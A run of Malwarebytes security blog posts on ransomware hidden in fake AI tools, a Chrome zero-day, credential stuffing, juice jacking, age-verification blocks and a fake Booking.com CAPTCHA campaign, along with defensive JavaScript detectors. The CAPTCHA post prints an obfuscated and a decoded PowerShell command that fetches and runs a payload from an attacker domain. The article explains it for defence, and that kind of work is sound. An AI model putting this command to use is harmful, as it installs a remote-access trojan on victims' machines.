Malware Bytes
Pornhub, RedTube, and YouPorn block access in France, VPN use set to soar
VPNs (Virtual Private Networks) are suddenly popular in France. Not because France has suddenly become super privacy conscious, but because Pornhub, RedTube, and YouPorn have blocked access in France.
But why? Last year, France enacted a law mandating that pornographic sites implement stricter age-verification technology.
Since March 1, 1994, French law has prohibited exposing minors to pornographic content. To strengthen this, a 2020 law empowered the French Regulatory Authority for Audiovisual and Digital Communication (ARCOM) to issue warnings to non-compliant online services and seek judicial orders to block access if necessary.
In 2024, the French law on securing and regulating the digital environment (SREN) further enhanced ARCOM’s authority, allowing it to administratively block platforms that fail to prevent minors from accessing pornographic content.
On October 9, 2024, ARCOM adopted a technical framework, approved by the French Data Protection Agency (CNIL), outlining minimum requirements for age verification systems.
The requirements consisted of three major pillars:
- Reliability
- Third party implementation
- Mandatory on each access
Services had until January 9, 2025, to comply, with a transitional period until April 9, 2025, during which credit card-based verification was temporarily accepted under specific conditions.
In response to these regulations, the major adult websites like Pornhub, YouPorn, and RedTube have now suspended access in France, citing concerns over user privacy and data security associated with the mandated age verification methods.
This is a major decision for Pornhub because France is its second biggest market behind the US. Alex Kekesi, VP of brand and community at Aylo Holdings (Pornhub’s owner), said that:
“French citizens deserve a government and a regulator who are serious about preventing children from accessing adult content. They also deserve laws which protect their privacy and safeguard their sensitive data.”
In the United States, 19 states have passed laws requiring pornographic sites to confirm a user’s age by checking a government-issued ID, scanning their face, or other methods. The laws have led some of the largest adult sites, including Pornhub, to block users from those states, rather than paying millions for ID-checking services.
Naturally, everywhere where people want to View Porn Normally, the use of VPNs has increased because VPNs can be used to circumvent access restrictions imposed by such regulations. While specific figures for France are not publicly available, similar scenarios in other regions provide insight into user behavior:
- Florida: Following Pornhub’s decision to block access in response to new age verification laws, VPN demand in Florida surged by an astonishing 1,150% within the first few hours.
- Texas: After the implementation of comparable laws, VPN usage increased by approximately 234.8%.
Malwarebytes Privacy VPN can help adults to decide for themselves what they want to see or not. By choosing a location where no age verification block is in place, you will be able to access your coveted websites while also enjoying:
- No-log policy: Your activity is neither tracked nor stored.
- WireGuard protocol: Ensures fast and secure connections, good for streaming.
- Server coverage: Plenty of servers near you to cover countries that are not blocked.
- Strong encryption: To keep your web activity safe from prying eyes.
Ransomware hiding in fake AI, business tools
Artificial intelligence (AI) and small business tools are being abused as smokescreens to hit unsuspecting victims with ransomware.
In the masquerade campaigns discovered by Cisco Talos, cybercriminals hid malware behind software and install packages that mimicked the websites or names of the lead monetization service Nova Leads, the enormously popular Chat GPT, and an AI-empowered video tool called InVideo AI.
As small businesses quickly adopt AI tools—a recent survey from the US Chamber of Commerce and the strategy firm Teneo revealed that 98% of small businesses already use at least one AI-powered product and 40% use generative AI—these cybercriminal lures pose the next, big threat to sole proprietors and boutique shops.
According to the researchers at Cisco Talos, the threat is twofold.
“Unsuspecting businesses in search of AI solutions may be deceived into downloading counterfeit tools in which malware is embedded,” Talos said. “This practice poses a significant risk, as it not only compromises sensitive business data and financial assets but also undermines trust in legitimate AI market solutions.”
In the first potential online attack, Talos found that cybercriminals created a fake website that closely resembled that of the legitimate company Nova Leads. The company helps businesses with lead monetization through acquisition, conversion, and content creation. But rather than simply copying the look and feel of Nova’s website, the cybercriminals also offered a completely fake, AI-powered product called “Nova Leads AI.”
On the malicious website, users were prompted to download Nova Leads AI for “free access” for 12 months. If users downloaded and installed the fake software, the ransomware CyberLock was instead deployed. Researchers at Talos analyzed how CyberLock moved throughout a network and retrieved the ransom note left behind by the cybercriminals. In it, the ransomware gang claimed, falsely, that their attacks were altruistic.
“We want to assure you that your payment does not go to us,” the ransomware gang said in its note. “It will instead go to support affected women and children in Palestine, Ukraine, Africa, Asia, and other regions where injustices are a daily reality.”
In the note, victims are directed to pay $50,000 in cryptocurrency. The ransomware campaign is particularly dangerous as cybercriminals managed to manipulate SEO practices to rank their malicious website near the top of relevant online searches. This method, called “SEO poisoning,” is deployed by scammers, hackers, and shady websites.
In a second potential attack, Talos found that a software installer labeled “ChatGPT 4.0 full version – Premium.exe” was actually hiding the ransomware Lucky_Gh0$t. Interestingly, the files contained within the installer also contained legitimate open-source AI tools from Microsoft, likely as an evasion technique to ward off any antivirus tools inspecting the package for malware.
Though the Lucky_Gh0$t ransom note did not include a specific dollar amount, the cybercriminals displayed a starkly different attitude from CyberLock’s alleged humanitarianism:
“We are not a politically motivated group and we do not need anything other than your money.”
In the last potential attack, Talos found a new malware that the team dubbed “Numero.” Though it is not officially a form of ransomware, Talos found that, once deployed, it effectively renders systems “completely unusable.”
Talos discovered that the malware’s internal data co-opted the product and organization names of the service InVideo AI, an AI-powered video generation service that can be used for marketing, content, and more.
While cybercriminals have long disguised their malware under popular brands, the emergence of AI—and its popularity for small businesses—highlights the dangers that small shops face simply for trying to do business online. But there is help at hand.
How to protect your small business from ransomware
As is true with all malware infections, the best defense against a ransomware attack is to never allow an attack to occur in the first place. Take the following steps to secure your business from this existential threat:
- Block common forms of entry. Patch known vulnerabilities in internet-facing software and disable or harden the login credentials for remote work tools like RDP ports and VPNs.
- Prevent intrusions and stop malicious encryption. Stop threats early before they can infiltrate or infect your endpoints. Use always-on cybersecurity software that can prevent exploits and malware used to deliver ransomware.
- Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
- Don’t get attacked twice. Once you’ve isolated an outbreak and stopped a first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.
Google fixes another actively exploited vulnerability in Chrome, so update now!
Google has released an update for the Chrome browser to patch an actively exploited flaw.
The update brings the Stable channel to versions 137.0.7151.68/.69 for Windows and Mac and 137.0.7151.68 for Linux.
The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.
To manually get the update, click the “more menu” (three stacked dots) > Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete, and for you to be safe from the vulnerability.
The About Chrome menu while updating
This update is crucial since it addresses an actively exploited vulnerability that an attacker could exploit through a specially crafted HTML page (website).
Technical details
The vulnerability tracked as CVE-2025-5419 is an out-of-bounds read and write in Google Chrome’s “V8,” which is the engine that Google developed for processing JavaScript. Prior to Google Chrome version 137.0.7151.68, this vulnerability allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
V8 has been a significant source of security problems in the past.
An out-of-bounds read and write vulnerability means that the attacker can manipulate parts of the device’s memory that should be out of their reach. Such a flaw in a program allows it to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers can write code to a part of the memory where the system executes it with permissions that the program and user should not have.
Google knows that attackers currently exploit CVE-2025-5419 in the wild, but released no details yet on who exploits the flaw, how they do it in real-world attacks, or who the targets are in those attacks. However, the Google Threat Analysis Group (TAG) team, which discovered the exploit, focuses on spyware and nation-state attackers who abuse zero days for espionage purposes.
This Chrome update also patches a medium-severity, use-after-free flaw (CVE-2025-5068) in the open-source rendering engine Blink and one internally discovered vulnerability.
We don’t just report on browser vulnerabilities. Malwarebytes’ Browser Guard protects your browser against malicious websites and credit card skimmers, blocks unwanted ads, and warns you about relevant data breaches and scams.
Scammers are constantly changing the game, but so are we. Introducing Malwarebytes Scam Guard
Mobile scams are becoming increasingly sophisticated, leaving people vulnerable to cybercriminals.
We recently reported on the ever-increasing number of scams that are created by AI-supported tools, with attackers crafting highly convincing phishing emails that target both individuals and businesses, resulting in devastating financial losses, reputational damage, and compromised personal data.
Elaborate sextortion scams manipulate victims by using shame as a tactic to coerce them into taking action, sometimes draining their life savings.
And the list goes on. Scammers are always finding new ways to trick their victims into giving them their hard-earned money or sensitive information.
These tactics include urging individuals to change their address information on a non-existent delivery, promoting job opportunities that just seem too good to be true, or having a long-lost family member reach out on WhatsApp to invite you to share their newfound fortune with you.
As scammers develop new ways of exploiting unsuspecting users, Malwarebytes is introducing Scam Guard to combat this new wave of threats.
Scam Guard simplifies scam prevention by providing real-time feedback via an easy-to-use AI-powered chat. Just submit a screenshot, paste suspicious content, or share texts and numbers, and we’ll give you immediate personalized guidance and safety tips.
Scam Guard is unique in that it’s backed by Malwarebytes’ extensive threat research knowledge base, making it both effective and efficient.
Whether users come across a suspicious message on social media, a phishing attempt in their email, or a questionable text message, Scam Guard provides immediate, expert advice to keep them secure.
Key features of Scam Guard
- AI-powered chat companion: An intuitive, mobile-first advisor available 24/7 that provides guidance to users on suspicious content or activities.
- Comprehensive scam detection: Scam Guard is trained to recognize various scams, including romance, phishing, financial fraud, text, robocall, and shipping fraud, helping you stay ahead of cybercriminals at all times.
- Constantly evolving: Scam Guard learns from users who submit new or unknown scams, which in turn helps protect the broader community.
- 24/7 support: Scam Guard is available around the clock, ensuring that users receive timely advice and assistance, no matter where they are or what time it is.
- Holistic mobile security: Embedded within the Malwarebytes Mobile Security app, Scam Guard works alongside our all-in-one advanced protection for iOS and Android.
Reporting suspicious content has never been easier—simply tap to submit right in the app.
Scam Guard is available for both free and paid users of Malwarebytes Mobile Security (iOS and Android), without having to install an additional app.
Try it out for yourself: Download Malwarebytes Mobile Security for iOS or Android.
The North Face warns customers about potentially stolen data
For the fourth time in its history, The North Face has notified customers that their account may have been compromised. This time, the company laid blame on a credential stuffing attack.
The North Face is best known for its line of outdoor clothing, footwear, and related equipment. With an annual revenue of over $3 billion, companies like The North Face are on the radar of cybercriminals.
The notice from The North Face says:
“On April 23, 2025, we discovered unusual activity involving our website, thenorthface.com (“Website”), which we investigated immediately. Following a careful and prompt investigation, we concluded that an attacker had launched a small-scale credential stuffing attack against our Website on April 23, 2025.”
Credential stuffing is the automated injection of stolen username and password pairs into website login forms, in order to fraudulently gain access to user accounts. Many users reuse the same password and username/email, so if those credentials are stolen from one site, for example in a data breach or phishing attack, attackers can use the same credentials to compromise accounts on other services.
With these credentials, the attackers may have found additional information like:
- Purchases made on the website
- Shipping address(es)
- Preferences
- Email address(es)
- First and last name
- Date of birth (if the user saved it to their account)
- Telephone number (if the user saved it to their account)
The North Face also said that no payment card data was compromised, as the company does not keep a copy of that information on the website. But the kind of data that was compromised still enriches a cybercriminal’s data set and helps them in performing more targeted and effective attacks.
The North Face also said:
“Please know that protecting your personal information is something that we take very seriously.”
One would think that after four credential stuffing attacks, The North Face would at least introduce the option to use multi-factor-authentication (MFA) on their website, but there’s no sign of that, let alone the enforcement of MFA. Maybe that’s because the credential stuffing attacks were dwarfed by the December 2023 ransomware attack that was later confirmed to have impacted 35 million customers.
Instead, The North Face stated that it quickly disabled passwords to halt the attack, and all users will need to create a new and unique password on the website if they have not already done so.
The emphasis on unique was done by me, because credential stuffing attacks are only successful because we have so many passwords that it’s no wonder we re-use them. Alternatively, people can look at password managers which can create and memorize complex passwords for you. But to me, it proves once again that it’s time to leave the era of passwords behind us.
The North Face is joining a long line of high-end targets that were recently attacked, including Adidas, Dior, Tiffany, Cartier, Victoria’s Secret, and Marks & Spencer.
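Credential stuffing as described above leaves a recognisable pattern in login logs: one source trying many different usernames, almost all of which fail. The following is an added example, not code from The North Face or Malwarebytes; the log format, thresholds, addresses and function names are assumptions made for illustration. It flags such sources and lists the accounts that logged in successfully from them, which are the ones that need a forced password reset.

```javascript
// Constructed sample log: "<ISO time> <source IP> <username> <OK|FAIL>".
// Addresses come from the documentation ranges; usernames are made up.
const LOGIN_LOG = `
2025-04-23T10:00:01Z 203.0.113.7 alice@example.com FAIL
2025-04-23T10:00:02Z 203.0.113.7 bob@example.com FAIL
2025-04-23T10:00:03Z 203.0.113.7 carol@example.com OK
2025-04-23T10:00:04Z 203.0.113.7 dave@example.com FAIL
2025-04-23T10:00:05Z 203.0.113.7 erin@example.com FAIL
2025-04-23T10:00:06Z 203.0.113.7 frank@example.com FAIL
2025-04-23T10:01:10Z 198.51.100.20 grace@example.com FAIL
2025-04-23T10:01:15Z 198.51.100.20 grace@example.com FAIL
2025-04-23T10:01:21Z 198.51.100.20 grace@example.com OK
2025-04-23T10:02:00Z 192.0.2.44 heidi@example.com OK
`;

// Turn log text into event objects.
function parseLog(text) {
  return text.split('\n').map((l) => l.trim()).filter(Boolean).map((line) => {
    const [ts, ip, user, result] = line.split(/\s+/);
    return { time: Date.parse(ts), ip, user: user.toLowerCase(), ok: result === 'OK' };
  });
}

// Flag sources that, within one sliding time window, try at least `minUsers`
// distinct usernames with a failure ratio of at least `minFailRatio`.
// A user who mistypes their own password hits one username, so is not flagged.
function detectStuffing(events, { windowMs = 60000, minUsers = 5, minFailRatio = 0.8 } = {}) {
  const byIp = new Map();
  for (const e of events) {
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }

  const findings = [];
  for (const [ip, list] of byIp) {
    list.sort((a, b) => a.time - b.time);
    let start = 0;
    let flagged = false;
    for (let end = 0; end < list.length && !flagged; end++) {
      // Shrink the window from the left until it spans at most windowMs.
      while (list[end].time - list[start].time > windowMs) start++;
      const win = list.slice(start, end + 1);
      const users = new Set(win.map((e) => e.user));
      const fails = win.filter((e) => !e.ok).length;
      flagged = users.size >= minUsers && fails / win.length >= minFailRatio;
    }
    if (flagged) {
      // Any success from a flagged source means the stolen pair worked here.
      const accountsToReset = [...new Set(list.filter((e) => e.ok).map((e) => e.user))];
      findings.push({ ip, attempts: list.length, accountsToReset });
    }
  }
  return findings;
}

console.log(JSON.stringify(detectStuffing(parseLog(LOGIN_LOG)), null, 2));
```

Attackers often spread attempts across many source addresses, so a per-source check like this is one signal among several rather than a complete control.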
Protecting yourself after a data breach
There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.
- Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
- Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
- Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
- Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
- Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
- Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
- Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.
Check your exposure
The Identity Theft Resource Center’s regularly published statistics show that it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan, and we’ll give you a report.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
Juice jacking warnings are back, with a new twist
Remember juice jacking? It’s a term that crops up every couple of years to worry travelers. This spring has seen another spate of stories, including a new, more sophisticated form of attack. But how much of a threat is it, really?
Juice jacking is where an attacker uses a malicious public USB charger to install malware on, or steal information from, your phone. In theory, the victim plugs their phone into a USB charging port like those found in airports, restaurants or public transportation to top up their battery. The attacker has programmed the charger to start a data connection with the phone, allowing them to perhaps view files or control apps.
Both Apple and Android operating system developer Google coded rudimentary protections against juice jacking into their operating systems years ago. They updated their software so that users would have to approve any request to control the phone via a USB port.
However, as Ars Technica reported last week, researchers have found a way past these mechanisms in a new variation on the theme called ChoiceJacking.
Ars offers a detailed technical analysis of the exploit, invented by researchers at Austria’s Graz University of Technology. In short, though, it gives itself permission to control the phone by spoofing the user’s button-pressing for them.
Government agencies continue to warn about the risks of juice jacking. The TSA was the most recent, posting a warning about the issue on Facebook back in March:
“Hackers can install malware at USB ports (we’ve been told that’s called ‘juice/port jacking’). So, when you’re at an airport do not plug your phone directly into a USB port. Bring your TSA-compliant power brick or battery pack and plug in there.”
The TSA is well-intentioned, but behind the times. The FBI’s Denver office tweeted about this threat back in 2023, and the LA County District Attorney’s office posted about it in 2019.
Researchers have highlighted the threat since at least 2011, when the Defcon conference installed public charging stations that would flash a warning message on peoples’ phones. Since then, others have presented on the possible risks, and enterprising tinkerers have released malicious cables that take control of devices when plugged into them.
Have any juicers actually been jacked?
The FCC, which has had an advice page about this issue since 2019, said two years ago that it hadn’t found any real-world attacks, and Malwarebytes hasn’t found any since.
However, the lack of publicly documented attacks doesn’t mean that juice jacking isn’t a risk. It’s theoretically feasible. So how can you protect against it?
Both Apple and Google have updated their operating systems to require more robust authentication than simply pressing a button when a connected USB device asks to take over your phone. However, not all iPhone users will necessarily update their devices. Android-based smartphone vendors get to implement their own versions of the operating system on their own schedule, and many take a long time to roll out new protections if they do so at all.
One way to be sure that your phone won’t get hijacked by a malicious charging station is to use a USB cable that has the data communication pins disconnected, meaning that a malicious charging port can’t talk to your phone. However, the Ars article warns that this might also interfere with the charging process on some phones.
One alternative is to power down your phone before plugging it in. Or take your own portable charging battery with you and skip the ports altogether.
Oh, and don’t use public Wi-Fi, says TSA
On another note, the TSA Facebook post also offered another piece of advice: “Don’t use free public WiFi, especially if you’re planning to make any online purchases,” it warned. “Do not ever enter any sensitive info while using unsecure WiFi [sic].”
This advice has merit. Attackers can snoop on public Wi-Fi connections, although the advancement of HTTPS on websites means this is less of a risk nowadays for everyday browsing. However, if you’re doing anything of a sensitive nature, such as online banking, you can use a VPN to encrypt your traffic.
A simple alternative is to simply use cellular data instead, tethering your phone if you’re using a tablet or PC.
Which of these anti-juice-jacking and Wi-Fi snooping protections should you choose? As with all cybersecurity decisions, this is a question of how much risk you’re prepared to tolerate. Personally, I err on the side of caution. A little inconvenience now could save you significant trouble later.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Victims risk AsyncRAT infection after being redirected to fake Booking.com sites
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.
The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.
Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.
Fake Captcha prompt
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.
Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.
Instructions to infect your own device
If you’re using Chrome, you may see this warning:
Chrome issues a warning but the danger may be unclear to users
The warning is nice, but it’s not very clear what this warning is for, in my opinion.
Users of Malwarebytes’ Browser Guard will see this warning:
Malwarebytes Browser Guard’s clipboard warning
“Hey, did you just copy something?
Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”
Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.
What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.
Should a user fall for this without any protections enabled, the command will open a hidden PowerShell window to download and execute a file called ckjg.exe, which in turn would download and execute a file called Stub.exe, which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.
Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.
The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.
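The mixed casing and quote interruption described above stop working as camouflage once the clipboard text is normalized before inspection. The following is an added example, not Browser Guard's code; the function names, indicator tags and minimum parameter-prefix lengths are assumptions made for illustration. It strips the noise characters, then looks for a PowerShell invocation combined with a hidden window, a remote fetch and dynamic execution.

```javascript
// Test input: the obfuscated command quoted in the article, verbatim.
const OBFUSCATED = String.raw`pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"`;

// Characters used to break up keywords: straight and curly quotes,
// PowerShell's backtick escape and cmd's caret escape.
const NOISE = /["'`^\u2018\u2019\u201c\u201d]/g;
// PowerShell also accepts these Unicode dashes in front of a parameter name.
const DASHES = /[\u2013\u2014\u2015]/g;

const FETCHERS = new Set(['invoke-restmethod', 'irm', 'invoke-webrequest', 'iwr',
  'curl', 'wget', 'start-bitstransfer']);
const EXECUTORS = new Set(['invoke-expression', 'iex']);

// Undo dash substitution, quote interruption, odd spacing and mixed casing.
function normalize(text) {
  return text.replace(DASHES, '-').replace(NOISE, '')
    .replace(/\s+/g, ' ').trim().toLowerCase();
}

// True when `token` is -name or /name and name is a prefix of `full`
// (PowerShell lets parameter names be shortened). `min` is this example's
// assumption for the shortest prefix worth matching.
function isParam(token, full, min) {
  if (!/^[-/]/.test(token)) return false;
  const name = token.slice(1);
  return name.length >= min && full.startsWith(name);
}

function inspectClipboard(text) {
  const normalized = normalize(text);
  const tokens = normalized.split(/[\s;|(){}=,]+/).filter(Boolean);
  const indicators = new Set();

  tokens.forEach((tok, i) => {
    const next = tokens[i + 1] || '';
    if (/(?:^|[\\/])(?:powershell|pwsh)(?:\.exe)?$/.test(tok)) indicators.add('powershell');
    if (isParam(tok, 'noprofile', 3)) indicators.add('no-profile');
    if (isParam(tok, 'encodedcommand', 1)) indicators.add('encoded-command');
    if (isParam(tok, 'windowstyle', 1) && next && 'hidden'.startsWith(next)) {
      indicators.add('hidden-window');
    }
    if (FETCHERS.has(tok)) indicators.add('remote-fetch');
    if (EXECUTORS.has(tok)) indicators.add('dynamic-exec');
  });
  // .NET WebClient download methods are another common fetch primitive.
  if (/\.download(?:string|file|data)/.test(normalized)) indicators.add('remote-fetch');

  const has = (k) => indicators.has(k);
  const suspicious = has('powershell') && (
    (has('remote-fetch') && has('dynamic-exec')) ||
    has('encoded-command') ||
    (has('hidden-window') && (has('remote-fetch') || has('dynamic-exec'))));

  return { suspicious, indicators: [...indicators].sort(), normalized };
}

console.log(inspectClipboard(OBFUSCATED));
```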
IOCs
The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.
Malwarebytes blocks the download from bkngnet[.]com
How to stay safe
There are a few things you can do to protect yourself from falling victim to these and similar methods:
- Do not follow instructions provided by a website you visited without thinking it through.
- Use an active anti-malware solution that blocks malicious websites and scripts.
- Use a browser extension that blocks malicious domains and scams.
- Disable JavaScript in your browser before visiting unknown websites.
The clipboard access is triggered by a JavaScript function document.execCommand('copy'). Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.
A week in security (May 26 – June 1)
Last week on Malwarebytes Labs:
- Porn sites probed for allegedly failing to prevent minors from accessing content
- Take back control of your browser—Malwarebytes Browser Guard now blocks search hijacking attempts
- Deepfake-posting man faces huge $450,000 fine
- Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
- New warning issued over toll fee scams
- 184 million logins for Instagram, Roblox, Facebook, Snapchat, and more exposed online
Last week on ThreatDown:
- KMSpico explained: No, KMS is not “kill Microsoft”
- When you shouldn’t trust a trusted root certificate
Stay safe!
Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
What does Facebook know about me? (Lock and Code S06E11)
This week on the Lock and Code podcast…
There’s an easy way to find out what Facebook knows about you—you just have to ask.
In 2020, the social media giant launched an online portal that allows all users to access their historical data and to request specific types of information for download across custom time frames. Want to know how many posts you’ve made, ever? You can find that. What about every photo you’ve uploaded? You can find that, too. Or what about every video you’ve watched, every “recognized” device you’ve used to log in, every major settings change you made, every time someone tagged you to wish you “Happy birthday,” and every Friend Request you ever received, sent, accepted, or ignored? Yes, all that information is available for you to find, as well.
But knowing what Facebook knows about you from Facebook is, if anything, a little stale. You made your own account, you know who your Facebook friends (mostly) are, and you were in control of the keyboard when you sent those comments.
What’s far more interesting is learning what Facebook knows about you from everywhere else on the web and in the real world.
While it may sound preposterous, Facebook actually collects a great deal of information about you even when you’re not using Facebook, and even if you don’t have the app downloaded on your smartphone. As Geoffrey Fowler, reporter for The Washington Post, wrote when he first started digging into his own data:
“Even with Facebook closed on my phone, the social network gets notified when I use the Peet’s Coffee app. It knows when I read the website of presidential candidate Pete Buttigieg or view articles from The Atlantic. Facebook knows when I click on my Home Depot shopping cart and when I open the Ring app to answer my video doorbell. It uses all this information from my not-on-Facebook, real-world life to shape the messages I see from businesses and politicians alike.”
Today, on the Lock and Code podcast, host David Ruiz takes a look at his own Facebook data to understand what the social media company has been collecting about him from other companies. In his investigation, he sees that his Washington Post article views, the cars added to his online “wishlist,” and his purchases from PlayStation, APC, Freda Salvador, and the paint company Backdrop have all trickled their way into Facebook’s database.
Tune in today to listen to the full episode.
Show notes and credits:
Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)
Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.
Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.
Porn sites probed for allegedly failing to prevent minors from accessing content
Four porn sites are being investigated by the European Commission under its Digital Services Act (DSA) for allegedly failing to verify their users’ ages properly.
The Commission, which drafts and enforces the European Union’s laws, is focusing the lens on Pornhub, Stripchat, XNXX, and XVideos with the investigation. It launched the inquiry after sending requests for information to Pornhub, Stripchat and XVideos last June over how they were protecting minors.
The DSA, which came into force in November 2022, takes a strong position on who should be allowed to view adult material online. The Act singles out very large online platforms (VLOPs), which are online sites that have over 45 million users.
Article 28 of the Act directs these platforms to:
“…appropriate and proportionate measures to ensure a high level of privacy, safety, and security of minors, on their service.”
And article 35 mandates that VLOPs take:
“…targeted measures to protect the rights of the child, including age verification and parental control tools, tools aimed at helping minors signal abuse or obtain support, as appropriate”.
The investigation follows the Commission’s publication of draft guidelines for the protection of minors online for all VLOPs (not just adult ones) earlier this month. These guidelines included implementing age verification measures. The Commission is inviting public feedback on that consultation by June 10.
Age verification in the US
This isn’t the first time that large adult sites have had to deal with this issue. Multiple US states have passed legislation requiring age verification for the sites, prompting Pornhub to block access to its services there. Pornhub chose to do that rather than comply with the age verification process because, it said, it didn’t want to invade people’s privacy:
“There are multiple ways that a user can prove their age, but any effective method requires them to submit some form of personally identifiable information (“PII”), like a driver’s license. By assigning this responsibility to the platform(s) visited by a user, this means submitting private information many times to adult sites all over the internet, while normalizing disclosure of PII across the internet. This is not a privacy-by-design approach.”
Pornhub also argued that its traffic dropped by 80% when it did try imposing age checks, and suggested that if asked for age verification, users will simply get adult material from other sources including piracy sites.
Verifying age safely
The Commission is planning to release a Digital Identity Wallet for identification purposes by the end of next year. In the meantime, it has promised an age verification app based on the same technology as the wallet by this summer. That app will enable people to verify their age without giving away any other personal information, it says.
Categorization as a VLOP under the DSA carries substantial risks. Those that don’t comply with the DSA face fines totaling up to 6% of their annual global revenue, and could even be banned from operating in the EU. In March 2024, Pornhub, XVideos and Stripchat sued the EU over their designations. Pornhub argued that the Commission miscalculated its user numbers, and contested a requirement to build a publicly accessible repository of advertisements running on the platform.
When announcing the investigation, the EU said that it is removing Stripchat as a VLOP because it doesn’t have enough EU users to qualify. That means it won’t have to comply with those requirements after September.
However, that doesn’t mean that Stripchat, or other smaller adult sites, are off the hook. The EBDS also announced an initiative to coordinate monitoring and control of these platforms among national regulators, it said. That includes sharing information about monitoring and enforcing age verification measures on those sites.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
Take back control of your browser—Malwarebytes Browser Guard now blocks search hijacking attempts
Search hijacking, often referred to as browser hijacking, occurs when cybercriminals modify users’ browser settings without their consent. This often results in users being redirected to potentially malicious websites, such as fake customer service offerings.
Search hijacking commonly happens through free downloads, bundled software, or fake browser extensions that pose as helpful tools.
These attacks can be very stealthy and often go unnoticed until the victim sees unexpected changes in their browsing activity.
Hijacking attacks may involve adding fraudulent toolbars, redirecting users to websites that steal personal information, or installing ransomware on victims’ devices, forcing them to pay a ransom to regain access.
Malwarebytes Browser Guard already protects your browser by blocking malicious websites, credit card skimmers, and trackers. Now, it will actively monitor your search results for unauthorized modifications and alert you to potential scams, providing an essential layer of additional protection.
Add Malwarebytes Browser Guard to your favorite browser for free. Try it now
Deepfake-posting man faces huge $450,000 fine
A man is facing a $450,000 AU fine after he published deepfake images of prominent Australian women on the now-defunct MrDeepfakes web site. That’s if Australia’s online safety regulator gets its way.
Anthony Rotondo faces charges of posting these and other explicit deepfake images to the MrDeepfakes website, which closed down earlier this month.
